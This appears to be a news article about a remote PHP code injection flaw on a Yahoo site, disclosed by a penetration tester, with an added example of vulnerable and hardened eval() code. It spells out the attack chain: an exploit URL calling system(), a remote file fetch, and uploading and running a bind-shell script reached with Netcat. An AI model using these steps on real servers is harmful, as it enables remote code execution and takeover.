Ebrahim Hegazy, a web application penetration tester, has discovered a critical remote PHP code injection vulnerability in the Yahoo website that could have allowed attackers to inject and execute arbitrary PHP code on the Yahoo server.
A PHP code injection flaw allows an attacker to execute PHP code, such as a call to system() or any other PHP function. It occurs when a user sends untrusted data to the target through parameter values that are reflected inside an eval() call.
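An added example, not Yahoo's code and not from Ebrahim's write-up, showing how a request parameter reflected into eval() becomes code, beside a hardened version of the same lookup. The page name, the `sid` handling and the `seller` label are assumptions made for the illustration.

```php
<?php
// Added example (not the affected site's code). Assumed: a page reads ?sid=...
// and, in the vulnerable version, interpolates it into a double-quoted string
// that is then handed to eval().

// VULNERABLE: the parameter lands inside a double-quoted string under eval().
// PHP's "${...}" curly syntax in that string evaluates the enclosed expression,
// so a value shaped like ${@print(...)} runs code instead of staying text.
function lookupVulnerable(array $query): string
{
    $sid = $query['sid'] ?? '';
    eval('$label = "seller ' . $sid . '";');   // untrusted data inside eval()
    return $label;                              // eval() shares this scope
}

// HARDENED: request data never reaches eval(); the value is validated against
// the type the application actually expects and joined by plain concatenation.
function lookupHardened(array $query): string
{
    $raw = $query['sid'] ?? '';
    if (!preg_match('/\A[0-9]{1,10}\z/', $raw)) {
        throw new InvalidArgumentException('sid must be a numeric id');
    }
    return 'seller ' . (int) $raw;
}

// Constructed inputs for a local check. The hostile value is a harmless
// stand-in for the expression shape described in the article; it is only
// passed to the hardened function, which rejects it outright.
$benign  = ['sid' => '12345'];
$hostile = ['sid' => '${@print(1+1)}'];

echo lookupHardened($benign), PHP_EOL;   // seller 12345
try {
    lookupHardened($hostile);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The vulnerable function is only called with trusted input in a review; the lesson is that the same code path is unsafe for any request-controlled value, so the fix is to remove eval() from the path rather than to filter particular characters.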
Ebrahim tried to get around this by using file_get_contents("http://sec-down.com/poc.txt"), but that did not work because of the folder permissions. Did you say do it in /tmp?!
1- Upload "bind.sh", a bind connection script, into the /tmp directory
2- Execute it to make a bind connection with the server, e.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system("./tmp/bind.sh"))}
3- Receive the connection from the server in Netcat, and now I will be free to run commands
He actually used Netcat, which is a hacking tool that could be detected by any simple AV/IDS on the system; that could have ruined the whole thing.
Proof of concept
Yahoo fixed the issue immediately after receiving the notification from Ebrahim Hegazy. He is still waiting for the bug bounty reward for the bug.